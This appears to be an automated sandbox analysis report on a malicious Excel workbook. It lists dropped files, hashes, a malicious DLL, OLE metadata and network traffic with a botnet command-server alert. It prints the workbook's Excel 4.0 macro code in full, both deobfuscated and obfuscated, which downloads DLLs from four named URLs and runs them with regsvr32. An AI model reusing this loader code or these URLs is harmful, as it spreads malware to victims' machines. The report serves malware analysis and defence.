                              SSDEEP:768:6kPWKpb8rGYrMPe3q7Q0XV5xtezEs/68/dgAHxKd:6XKpb8rGYrMPe3q7Q0XV5xtezEsi8/dK
                              MD5:12CE0FFD37F123D2F8492F28817265C3
                              SHA1:DF7C171FBB7B6AC05825D1C7ABC7DC60C4603D51
                              SHA-256:507A05F1A092B3CF006BE54D42D986ABF26164ACE6C2943D9832D59A8815A1AC
                              SHA-512:13CC319134AEE2BD12A6678D797EA381739790BBE3DD1E1A0E0BDA29630383F13855B280FAF62C5B8F1492C59EEC4FA64B6E3A932629B807409BAA5B106A66C7
                              Malicious:false
                              Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\8PWG8A6W.txt

                              Download File
                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                              File Type:ASCII text
                              Category:dropped
                              Size (bytes):235
                              Entropy (8bit):5.508145683276218
                              Encrypted:false
                              SSDEEP:6:7KH2jzcdWTKYfq9cFQaj6oLRMmmiQWiV/EOES2nLJKq/n:OH2jLTfqGSgD9GV/dESIdKon
                              MD5:0F056143FD332A8E65047D0053992A23
                              SHA1:BEA5E0DD015238AA6A3EDA63612505484A98FAB5
                              SHA-256:5251CAF5E03664DE3A4E12E5D2F240CA585788E29980290C9CF4C44D4973809E
                              SHA-512:4CAF3C7B57FA5FDAC470D4109A727980B5F187CCF42014AF00A43BDA32D3D110B9530EE60423FE4768FC1F06EBDE4099A24F879C302CAED5845FE68694A554AD
                              Malicious:false
                              Preview:PrestaShop-a30a9934ef476d11b6cc3c983616e364.9ybostxWPod7nP43PifVMXkPdOrv4EO5U%2FKqPmWtgSFI2Ckr%2B1t%2BqGSwMBMouqmkFK0SD2XdZ7Cg5qtQQ9RwtkOJ6mVwbNsm9NO1rvVxNh8%3D000079.www.3d-stickers.com/.9728.1418004736.31000734.2123741222.30996786.*.

                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\BZQ2JIWJ.txt

                              Download File
                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                              File Type:ASCII text
                              Category:dropped
                              Size (bytes):235
                              Entropy (8bit):5.460357111756994
                              Encrypted:false
                              SSDEEP:6:7KH2jzcdWTKYfq9cF2oQeitr8in2ohh4aESVO9LR1Xc/n:OH2jLTfqGGeordESCd1X6n
                              MD5:2166D8A7D2DFFF71395DF17D75B09E90
                              SHA1:91E904E6BA960AB3BB4D0DFEBF5F08C0F3220486
                              SHA-256:046A23BEEF7FAAAC275308BC7725C8E223BFFD251DE8C7B6EE04F5915DE77D87
                              SHA-512:D01D90802AEFC1EDD0C583324CB95C1EEA37F09964936BB3AB3FBEA647119D23CC885BA48A0F690B7BF6ED4E9783BCBD0A487F096FA7B0337C751E5767C87E8C
                              Malicious:false
                              Preview:PrestaShop-a30a9934ef476d11b6cc3c983616e364.9ybostxWPod7nP43PifVMXkPdOrv4EO5U%2FKqPmWtgSFolWp%2F7SQd8f90S8O%2FCwGohxkvf3iPluWhTbyznpM1hokG52ER60fuMOhd0m7WY6E%3D000075.www.3d-stickers.com/.9729.1428004736.31000734.2126704407.30996786.*.

                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\CKTKLCSO.txt

                              Download File
                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                              File Type:ASCII text
                              Category:dropped
                              Size (bytes):299
                              Entropy (8bit):5.692045040958048
                              Encrypted:false
                              SSDEEP:6:7xHBO5Yve9eBH+XYF7ySrRm5lrCGiVdxl/OJJuSXbUOlLJhc/n:IYGwgIF7XrRolB8ekSXbzl1on
                              MD5:19E2B2D7C66D40618C81AC3546BEAE90
                              SHA1:67A9501350CC96E9E2B8BD2881C8C9235FB3FCF3
                              SHA-256:48055EA645A59A29076A5F8C4843EFDB2CFC2B118349B953151177CDF0F359CA
                              SHA-512:58FE17F4E3D2951F12F6D83EF5D452D789AEF93E7BEB934A0CD712A7B4093CB8761B7D3649FA266C5306F4CCBDC16A44B4ADC7F16B4000FE2B9FE6F70DEE3E55
                              Malicious:false
                              Preview:PrestaShop-7318ab2db5e4a3c3a59fb8879ad22162.Nw04PzmYYXL6IgJsn1ERim4S4YpS6Ls6dHZki%2FijBePykYJIX2P7PO%2Fz2gyuaY7u4EN7ldFY91oSo8hffAyJadQKSdMuXRfEPnyOP0LrcMPyEqQYzhnB8nK%2F56PKGV92LhwlADR0Cai9xEpKkyPgYTgxlYN3LtX9AYwD4O0bLpA%3D000115.www.spinbalence.com/.9217.1418004736.31000734.2119685236.30996786.*.

                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\FBMK8V7A.txt

                              Download File
                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                              File Type:ASCII text
                              Category:dropped
                              Size (bytes):301
                              Entropy (8bit):5.6726332428940225
                              Encrypted:false
                              SSDEEP:6:7KH2jzcdWTKYfq9cF2oQeiHMbCVSFSOqtMNOVoqezONrmdUESXbUT9LlT3/n:OH2jLTfqGGeG3gOVoqezOt/ESXb8lvn
                              MD5:B8BFEB8443782B503127A33A8F8D5882
                              SHA1:285B5B5F2B62FE82F9793BD412AE11AF1A928493
                              SHA-256:6B812A7D11D3DBF7FEA4981AB42FFBBABD6FD332A0DAEAD98B43DF5CF7D6B9CF
                              SHA-512:0EE832E84AD318633EA7D2C206C5C25144D9702B973C668F488D019F92BB3A7E70D13789DE0A5DA0D1D5E2D36344CAEDBA17797802CA4AA2060C4054B31493A8
                              Malicious:false
                              Preview:PrestaShop-a30a9934ef476d11b6cc3c983616e364.9ybostxWPod7nP43PifVMXkPdOrv4EO5U%2FKqPmWtgSFolWp%2F7SQd8f90S8O%2FCwGo94XM8kzh2wgRtGRJ9nsrSftoVdV7kvSqSpdfLt4fdwNPMCppuBx0MZGFj5jTVvcGNOjxE63v9YLetElu6JEvu5ONuoJotfg%2BX0z1PXLVMbs%3D000115.www.3d-stickers.com/.9217.1428004736.31000734.2133724668.30996786.*.

                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\HC8X1KC5.txt

                              Download File
                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                              File Type:ASCII text
                              Category:dropped
                              Size (bytes):233
                              Entropy (8bit):5.522334543732003
                              Encrypted:false
                              SSDEEP:6:7xHBO5Yve9eBH+XYF7yN7sI5WysVh4gJJuSVKLAWM/n:IYGwgIF7VI5M7kScEWKn
                              MD5:149F05F2E0EC8BF53EEF327D0EFCC9AF
                              SHA1:5D6A04E27E0C976BF46754056921C9139F846F3E
                              SHA-256:DA03621D5EB7FDFB81C69553BCAEAF45C1DBBCF966B74AF29643EE03A8A2075B
                              SHA-512:B8CDDE1D30B031A4CC23592868AA30EF7156A3394E0A521F3C68EC8E9C0CD112A2F3492CBA14EC00A7B7D7240FE89896F8F162F1D359757B5BC03D11744587F9
                              Malicious:false
                              Preview:PrestaShop-7318ab2db5e4a3c3a59fb8879ad22162.Nw04PzmYYXL6IgJsn1ERim4S4YpS6Ls6dHZki%2FijBePykYJIX2P7PO%2Fz2gyuaY7ukuFjkghLJ9VD2B347P4foDXH3WhaK5EtQkBaO4YrzSE%3D000075.www.spinbalence.com/.9729.1408004736.31000734.2115317399.30996786.*.

                              C:\Users\user\Desktop\4470_02112022.xls

                              Download File
                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                              File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: Gydar, Last Saved By: Gydar, Name of Creating Application: Microsoft Excel, Create Time/Date: Fri Jun 5 19:19:34 2015, Last Saved Time/Date: Wed Nov 2 06:43:53 2022, Security: 0
                              Category:dropped
                              Size (bytes):221696
                              Entropy (8bit):7.123700873586195
                              Encrypted:false
                              SSDEEP:6144:EKpb8rGYrMPe3q7Q0XV5xtuEsi8/dgUyY+TAQXTHGUMEyP5p6f5jQm4:RbGUMVWlb4
                              MD5:BF25A37885BFBAB57186B599612EA504
                              SHA1:E4D2E377862C960C63CBEE1618CF6DA3FDD4ED4C
                              SHA-256:7D59A8DA03D7F39498848490727FEB8257C49CD2435119396222080164AB9A88
                              SHA-512:73D3F9CEAA2D4725F7D3B8BECE168DB848B54ECECE9461E9FA1EE6AECDA818F581465F092FC5275002176837C87C00B093DBE6C9C0B68DCEA45B5D308FD3B3EB
                              Malicious:true
                              Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................ZO..........................\.p....user B.....a.........=........................-.B.0...=.8.3.0.....................................=........Ve18.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1..............

                              C:\Users\user\oxnv4.ooccxx

                              Download File
                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                              Category:dropped
                              Size (bytes):769024
                              Entropy (8bit):6.637885736387009
                              Encrypted:false
                              SSDEEP:12288:8iW4+vsmQhWi6zQCXbPlLyqOMSRZuH/sAvvszVIf:8iWHhECXbPlLyqOMUMJvszVIf
                              MD5:22CE6200C1714603F94B11F6DF41140F
                              SHA1:F6A7B8550BE698D1BFC34219F245FEF7E7F59147
                              SHA-256:FB9AB8EFA3269F359F9010AECC543E992705E900CC11B02DBDFB1C6572A5500A
                              SHA-512:1F4421914A0172DAFE748711B0851DD2F977337DC7F9D170CAB0549C1906B110706FC302AD6652305B7335237551BE7CC4350AD0ABFB89315355F8BC8519B024
                              Malicious:true
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 81%
                              • Antivirus: Metadefender, Detection: 20%, Browse
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........%..K..K..K.%&..K..~6..K..~&.C.K.%0...K..J...K..~%.v.K..~1..K..~3..K.Rich.K.................PE..d.....dc.........." .....Z...^......`#.......................................`.......V..............................................0...O...P...................|e........... .......................................................p..........@....................text....Y.......Z.................. ..`.rdata.......p.......^..............@..@.data...p........:..................@....pdata..|e.......f..."..............@..@.rsrc...............................@..@.reloc..l0... ...2..................@..B........................................................................................................................................................................................................................................................................

                              C:\Windows\System32\SnILCOTnpOOFucYhP\FatGkw.dll (copy)

                              Download File
                              Process:C:\Windows\System32\regsvr32.exe
                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                              Category:dropped
                              Size (bytes):769024
                              Entropy (8bit):6.637885736387009
                              Encrypted:false
                              SSDEEP:12288:8iW4+vsmQhWi6zQCXbPlLyqOMSRZuH/sAvvszVIf:8iWHhECXbPlLyqOMUMJvszVIf
                              MD5:22CE6200C1714603F94B11F6DF41140F
                              SHA1:F6A7B8550BE698D1BFC34219F245FEF7E7F59147
                              SHA-256:FB9AB8EFA3269F359F9010AECC543E992705E900CC11B02DBDFB1C6572A5500A
                              SHA-512:1F4421914A0172DAFE748711B0851DD2F977337DC7F9D170CAB0549C1906B110706FC302AD6652305B7335237551BE7CC4350AD0ABFB89315355F8BC8519B024
                              Malicious:true
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 81%
                              • Antivirus: Metadefender, Detection: 20%, Browse
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........%..K..K..K.%&..K..~6..K..~&.C.K.%0...K..J...K..~%.v.K..~1..K..~3..K.Rich.K.................PE..d.....dc.........." .....Z...^......`#.......................................`.......V..............................................0...O...P...................|e........... .......................................................p..........@....................text....Y.......Z.................. ..`.rdata.......p.......^..............@..@.data...p........:..................@....pdata..|e.......f..."..............@..@.rsrc...............................@..@.reloc..l0... ...2..................@..B........................................................................................................................................................................................................................................................................

                              Static File Info

                              General

                              File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: Gydar, Last Saved By: Gydar, Name of Creating Application: Microsoft Excel, Create Time/Date: Fri Jun 5 19:19:34 2015, Last Saved Time/Date: Wed Nov 2 06:43:53 2022, Security: 0
                              Entropy (8bit):7.123491668947418
                              TrID:
                              • Microsoft Excel sheet (30009/1) 78.94%
                              • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
                              File name:4470_02112022.xls
                              File size:221696
                              MD5:d3b182de8c99553a9f2b6d0f3f030a4f
                              SHA1:d5bd989ffde2f67133b6404f9f234d13e618c206
                              SHA256:cd99b899c5a3d6ddb22969605b079375da897362b4d599fc9eebb1e21115a31d
                              SHA512:3abe78e4fca03e90d59818cded37a9feff6f7ade11cee1ef07c7ccd70cc4e250f7d835161409f0e8ba97cff4a678ef234298cb293ecac60e1ec0667a8904e484
                              SSDEEP:6144:WKpb8rGYrMPe3q7Q0XV5xtuEsi8/dgUyY+TAQXTHGUMEyP5p6f5jQm+:XbGUMVWlb+
                              TLSH:5A24F15B77999D6DF529C33408E7035AB233FD008F6B078B3649B395AFB48A05E13246
                              File Content Preview:........................>......................................................................................................................................................................................................................................

                              File Icon

                              Icon Hash:e4eea286a4b4bcb4

                              Static OLE Info

                              General

                              Document Type:OLE
                              Number of OLE Files:1

                              OLE File "4470_02112022.xls"

                              Indicators
                              Has Summary Info:
                              Application Name:Microsoft Excel
                              Encrypted Document:False
                              Contains Word Document Stream:False
                              Contains Workbook/Book Stream:True
                              Contains PowerPoint Document Stream:False
                              Contains Visio Document Stream:False
                              Contains ObjectPool Stream:False
                              Flash Objects Count:0
                              Contains VBA Macros:False
                              Summary
                              Code Page:1251
                              Author:
                              Last Saved By:
                              Create Time:2015-06-05 18:19:34
                              Last Saved Time:2022-11-02 06:43:53
                              Creating Application:
                              Security:0
                              Document Summary
                              Document Code Page:1251
                              Thumbnail Scaling Desired:False
                              Company:
                              Contains Dirty Links:False
                              Shared Document:False
                              Changed Hyperlinks:False
                              Application Version:1048576

                              Streams

                              Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                              General
                              Stream Path:\x5DocumentSummaryInformation
                              File Type:data
                              Stream Size:4096
                              Entropy:0.3944713856337448
                              Base64 Encoded:False
                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . S h e e t 4 . . . . . S h e e t 5 . . . . . S h e e
                              Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 20 01 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 64 00 00 00 0b 00 00 00 6c 00 00 00 10 00 00 00 74 00 00 00 13 00 00 00 7c 00 00 00 16 00 00 00 84 00 00 00 0d 00 00 00 8c 00 00 00 0c 00 00 00 e0 00 00 00
                              Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
                              General
                              Stream Path:\x5SummaryInformation
                              File Type:data
                              Stream Size:4096
                              Entropy:0.2780102568870367
                              Base64 Encoded:False
                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . X . . . . . . . h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . G y d a r . . . . . . . . . . . G y d a r . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . ? R , . @ . . . Z x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                              Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 a0 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 58 00 00 00 12 00 00 00 68 00 00 00 0c 00 00 00 80 00 00 00 0d 00 00 00 8c 00 00 00 13 00 00 00 98 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 08 00 00 00
                              Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 210174
                              General
                              Stream Path:Workbook
                              File Type:Applesoft BASIC program data, first line number 16
                              Stream Size:210174
                              Entropy:7.334559302852785
                              Base64 Encoded:True
                              Data ASCII:. . . . . . . . Z O . . . . . . . . . . . . . . . . . . . . \\ . p . . . . G y d a r B . . . . a . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . - . B . 0 . . . = . 8 . 3 . 0 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . V e 1 8 . . . . . . . X . @ . . .
                              Data Raw:09 08 10 00 00 06 05 00 5a 4f cd 07 c9 00 02 00 06 08 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 05 00 00 47 79 64 61 72 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

                              Macro 4.0 Code

                              Name:Sheet6
                              Extraction:dynamic
                              Type:4
                              Final:False
                              Visible:False
                              Protected:False
                              12,6,=FORMULA("=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://sat7ate.com/wordpress/ZAf5j4MG8Hwnig/","..\oxnv1.ooccxx",0,0)",G16)=FORMULA("=EXEC("C:\Windows\System32\regsvr32.exe"&Sheet3!P21&" ..\oxnv1.ooccxx")",G18)=FORMULA("=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.spinbalence.com/Adapter/moycMR/","..\oxnv2.ooccxx",0,0)",G20)=FORMULA("=EXEC("C:\Windows\System32\regsvr32.exe"&Sheet3!P21&" ..\oxnv2.ooccxx")",G22)=FORMULA("=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.3d-stickers.com/Content/Afa1PcRuxh/","..\oxnv3.ooccxx",0,0)",G24)=FORMULA("=EXEC("C:\Windows\System32\regsvr32.exe"&Sheet3!P21&" ..\oxnv3.ooccxx")",G26)=FORMULA("=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://navylin.com/bsavxiv/axHQYKl/","..\oxnv4.ooccxx",0,0)",G28)=FORMULA("=EXEC("C:\Windows\System32\regsvr32.exe"&Sheet3!P21&" ..\oxnv4.ooccxx")",G30)=FORMULA("=RETURN()",G36)
                              Name:Sheet6
                              Extraction:dynamic
                              Type:4
                              Final:False
                              Visible:False
                              Protected:False
                              12,6,=FORMULA("=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://sat7ate.com/wordpress/ZAf5j4MG8Hwnig/","..\oxnv1.ooccxx",0,0)",G16)=FORMULA("=EXEC("C:\Windows\System32\regsvr32.exe"&Sheet3!P21&" ..\oxnv1.ooccxx")",G18)=FORMULA("=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.spinbalence.com/Adapter/moycMR/","..\oxnv2.ooccxx",0,0)",G20)=FORMULA("=EXEC("C:\Windows\System32\regsvr32.exe"&Sheet3!P21&" ..\oxnv2.ooccxx")",G22)=FORMULA("=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.3d-stickers.com/Content/Afa1PcRuxh/","..\oxnv3.ooccxx",0,0)",G24)=FORMULA("=EXEC("C:\Windows\System32\regsvr32.exe"&Sheet3!P21&" ..\oxnv3.ooccxx")",G26)=FORMULA("=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://navylin.com/bsavxiv/axHQYKl/","..\oxnv4.ooccxx",0,0)",G28)=FORMULA("=EXEC("C:\Windows\System32\regsvr32.exe"&Sheet3!P21&" ..\oxnv4.ooccxx")",G30)=FORMULA("=RETURN()",G36)
15,6,=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://sat7ate.com/wordpress/ZAf5j4MG8Hwnig/","..\oxnv1.ooccxx",0,0)
17,6,=EXEC("C:\Windows\System32\regsvr32.exe ..\oxnv1.ooccxx")
19,6,=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.spinbalence.com/Adapter/moycMR/","..\oxnv2.ooccxx",0,0)
21,6,=EXEC("C:\Windows\System32\regsvr32.exe ..\oxnv2.ooccxx")
23,6,=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.3d-stickers.com/Content/Afa1PcRuxh/","..\oxnv3.ooccxx",0,0)
25,6,=EXEC("C:\Windows\System32\regsvr32.exe ..\oxnv3.ooccxx")
27,6,=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://navylin.com/bsavxiv/axHQYKl/","..\oxnv4.ooccxx",0,0)
29,6,=EXEC("C:\Windows\System32\regsvr32.exe ..\oxnv4.ooccxx")
35,6,=RETURN()
                              Name:Sheet6, Macrosheet
                              Extraction:static
                              Type:unknown
                              Final:unknown
                              Visible:True
                              Protected:unknown
                              SHEET: Sheet6, Macrosheet
CELL:G13, =(((((((FORMULA((((((((((((('Sheet1'!L24&'Sheet1'!L26)&'Sheet1'!L27)&'Sheet1'!L28)&'Sheet1'!L28)&'Sheet2'!F6)&'Sheet2'!N19)&'Sheet1'!F10)&'Sheet2'!R3)&'Sheet5'!Q21)&'Sheet2'!F26)&'Sheet3'!R13)&'Sheet5'!E9)&'Sheet3'!M26,G16)=FORMULA((((((((((((((((((('Sheet1'!L24&'Sheet1'!G8)&'Sheet1'!F4)&'Sheet1'!G8)&'Sheet1'!L26)&'Sheet1'!L30)&'Sheet1'!F24)&'Sheet1'!L26)&'Sheet3'!F19)&'Sheet3'!D5)&'Sheet1'!A4)&'Sheet3'!J14)&'Sheet1'!A4)&'Sheet3'!C32)&'Sheet1'!F10)&'Sheet3'!P21)&'Sheet3'!L8)&'Sheet5'!E9)&'Sheet1'!F24)&'Sheet1'!L31,G18))=FORMULA((((((((((((('Sheet1'!L24&'Sheet1'!L26)&'Sheet1'!L27)&'Sheet1'!L28)&'Sheet1'!L28)&'Sheet2'!F6)&'Sheet2'!N19)&'Sheet1'!F10)&'Sheet2'!R3)&'Sheet5'!Q21)&'Sheet2'!G28)&'Sheet3'!R13)&'Sheet5'!G15)&'Sheet3'!M26,G20))=FORMULA((((((((((((((((((('Sheet1'!L24&'Sheet1'!G8)&'Sheet1'!F4)&'Sheet1'!G8)&'Sheet1'!L26)&'Sheet1'!L30)&'Sheet1'!F24)&'Sheet1'!L26)&'Sheet3'!F19)&'Sheet3'!D5)&'Sheet1'!A4)&'Sheet3'!J14)&'Sheet1'!A4)&'Sheet3'!C32)&'Sheet1'!F10)&'Sheet3'!P21)&'Sheet3'!L8)&'Sheet5'!G15)&'Sheet1'!F24)&'Sheet1'!L31,G22))=FORMULA((((((((((((('Sheet1'!L24&'Sheet1'!L26)&'Sheet1'!L27)&'Sheet1'!L28)&'Sheet1'!L28)&'Sheet2'!F6)&'Sheet2'!N19)&'Sheet1'!F10)&'Sheet2'!R3)&'Sheet5'!Q21)&'Sheet2'!I27)&'Sheet3'!R13)&'Sheet5'!J3)&'Sheet3'!M26,G24))=FORMULA((((((((((((((((((('Sheet1'!L24&'Sheet1'!G8)&'Sheet1'!F4)&'Sheet1'!G8)&'Sheet1'!L26)&'Sheet1'!L30)&'Sheet1'!F24)&'Sheet1'!L26)&'Sheet3'!F19)&'Sheet3'!D5)&'Sheet1'!A4)&'Sheet3'!J14)&'Sheet1'!A4)&'Sheet3'!C32)&'Sheet1'!F10)&'Sheet3'!P21)&'Sheet3'!L8)&'Sheet5'!J3)&'Sheet1'!F24)&'Sheet1'!L31,G26))=FORMULA((((((((((((('Sheet1'!L24&'Sheet1'!L26)&'Sheet1'!L27)&'Sheet1'!L28)&'Sheet1'!L28)&'Sheet2'!F6)&'Sheet2'!N19)&'Sheet1'!F10)&'Sheet2'!R3)&'Sheet5'!Q21)&'Sheet2'!J29)&'Sheet3'!R13)&'Sheet5'!L12)&'Sheet3'!M26,G28))=FORMULA((((((((((((((((((('Sheet1'!L24&'Sheet1'!G8)&'Sheet1'!F4)&'Sheet1'!G8)&'Sheet1'!L26)&'Sheet1'!L30)&'Sheet1'!F24)&'Sheet1'!L26)&'Sheet3'!F19)&'Sheet3'!D5)&'Sheet1'!A4)&'Sheet3'!J14)&'Sheet1'!A4)&'Sheet3'!C32)&'Sheet1'!F10)&'Sheet3'!P21)&'Sheet3'!L8)&'Sheet5'!L12)&'Sheet1'!F24)&'Sheet1'!L31,G30))=FORMULA((('Sheet1'!L24&'Sheet1'!G44)&'Sheet1'!H46)&'Sheet1'!J44,G36), 0

                              Network Behavior

                              Snort IDS Alerts

                              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                              192.168.2.22218.38.121.17491784432404328 11/15/22-12:40:56.395248TCP2404328ET CNC Feodo Tracker Reported CnC Server TCP group 1549178443192.168.2.22218.38.121.17

                              Network Port Distribution

                              TCP Packets

                              TimestampSource PortDest PortSource IPDest IP
                              Nov 15, 2022 12:40:09.330590010 CET4917180192.168.2.22163.172.115.127
                              Nov 15, 2022 12:40:09.358549118 CET8049171163.172.115.127192.168.2.22
                              Nov 15, 2022 12:40:09.358733892 CET4917180192.168.2.22163.172.115.127
                              Nov 15, 2022 12:40:09.358906031 CET4917180192.168.2.22163.172.115.127
                              Nov 15, 2022 12:40:09.454010010 CET8049171163.172.115.127192.168.2.22
                              Nov 15, 2022 12:40:09.454103947 CET4917180192.168.2.22163.172.115.127
                              Nov 15, 2022 12:40:09.461774111 CET49172443192.168.2.22163.172.115.127
                              Nov 15, 2022 12:40:09.461822987 CET44349172163.172.115.127192.168.2.22
                              Nov 15, 2022 12:40:09.461898088 CET49172443192.168.2.22163.172.115.127
                              Nov 15, 2022 12:40:09.470781088 CET49172443192.168.2.22163.172.115.127
                              Nov 15, 2022 12:40:09.470814943 CET44349172163.172.115.127192.168.2.22
                              Nov 15, 2022 12:40:09.588445902 CET44349172163.172.115.127192.168.2.22
                              Nov 15, 2022 12:40:09.588565111 CET49172443192.168.2.22163.172.115.127
                              Nov 15, 2022 12:40:09.596662998 CET49172443192.168.2.22163.172.115.127
                              Nov 15, 2022 12:40:09.596693039 CET44349172163.172.115.127192.168.2.22
                              Nov 15, 2022 12:40:09.597215891 CET44349172163.172.115.127192.168.2.22
                              Nov 15, 2022 12:40:09.597331047 CET49172443192.168.2.22163.172.115.127
                              Nov 15, 2022 12:40:09.841413975 CET49172443192.168.2.22163.172.115.127
                              Nov 15, 2022 12:40:09.841450930 CET44349172163.172.115.127192.168.2.22
                              Nov 15, 2022 12:40:09.950990915 CET44349172163.172.115.127192.168.2.22
                              Nov 15, 2022 12:40:09.951159000 CET44349172163.172.115.127192.168.2.22
                              Nov 15, 2022 12:40:09.951229095 CET49172443192.168.2.22163.172.115.127
                              Nov 15, 2022 12:40:09.951266050 CET49172443192.168.2.22163.172.115.127
                              Nov 15, 2022 12:40:09.997137070 CET49172443192.168.2.22163.172.115.127
                              Nov 15, 2022 12:40:09.997137070 CET49172443192.168.2.22163.172.115.127
                              Nov 15, 2022 12:40:09.997169971 CET44349172163.172.115.127192.168.2.22
                              Nov 15, 2022 12:40:09.997241020 CET49172443192.168.2.22163.172.115.127
                              Nov 15, 2022 12:40:09.997951984 CET49173443192.168.2.22163.172.115.127
                              Nov 15, 2022 12:40:09.998007059 CET44349173163.172.115.127192.168.2.22
                              Nov 15, 2022 12:40:09.998075008 CET49173443192.168.2.22163.172.115.127
                              Nov 15, 2022 12:40:09.998292923 CET49173443192.168.2.22163.172.115.127
                              Nov 15, 2022 12:40:09.998313904 CET44349173163.172.115.127192.168.2.22
                              Nov 15, 2022 12:40:10.064899921 CET44349173163.172.115.127192.168.2.22
                              Nov 15, 2022 12:40:10.065222025 CET49173443192.168.2.22163.172.115.127
                              Nov 15, 2022 12:40:10.075557947 CET49173443192.168.2.22163.172.115.127
                              Nov 15, 2022 12:40:10.075583935 CET44349173163.172.115.127192.168.2.22
                              Nov 15, 2022 12:40:10.101274967 CET49173443192.168.2.22163.172.115.127
                              Nov 15, 2022 12:40:10.101304054 CET44349173163.172.115.127192.168.2.22
                              Nov 15, 2022 12:40:10.425060987 CET44349173163.172.115.127192.168.2.22
                              Nov 15, 2022 12:40:10.425245047 CET49173443192.168.2.22163.172.115.127
                              Nov 15, 2022 12:40:10.425282955 CET44349173163.172.115.127192.168.2.22
                              Nov 15, 2022 12:40:10.425365925 CET49173443192.168.2.22163.172.115.127
                              Nov 15, 2022 12:40:10.453300953 CET49173443192.168.2.22163.172.115.127
                              Nov 15, 2022 12:40:10.453550100 CET44349173163.172.115.127192.168.2.22
                              Nov 15, 2022 12:40:10.453581095 CET44349173163.172.115.127192.168.2.22
                              Nov 15, 2022 12:40:10.453613043 CET49173443192.168.2.22163.172.115.127
                              Nov 15, 2022 12:40:10.453644037 CET49173443192.168.2.22163.172.115.127
                              Nov 15, 2022 12:40:10.453672886 CET49173443192.168.2.22163.172.115.127
                              Nov 15, 2022 12:40:10.453672886 CET49173443192.168.2.22163.172.115.127
                              Nov 15, 2022 12:40:10.453672886 CET49173443192.168.2.22163.172.115.127
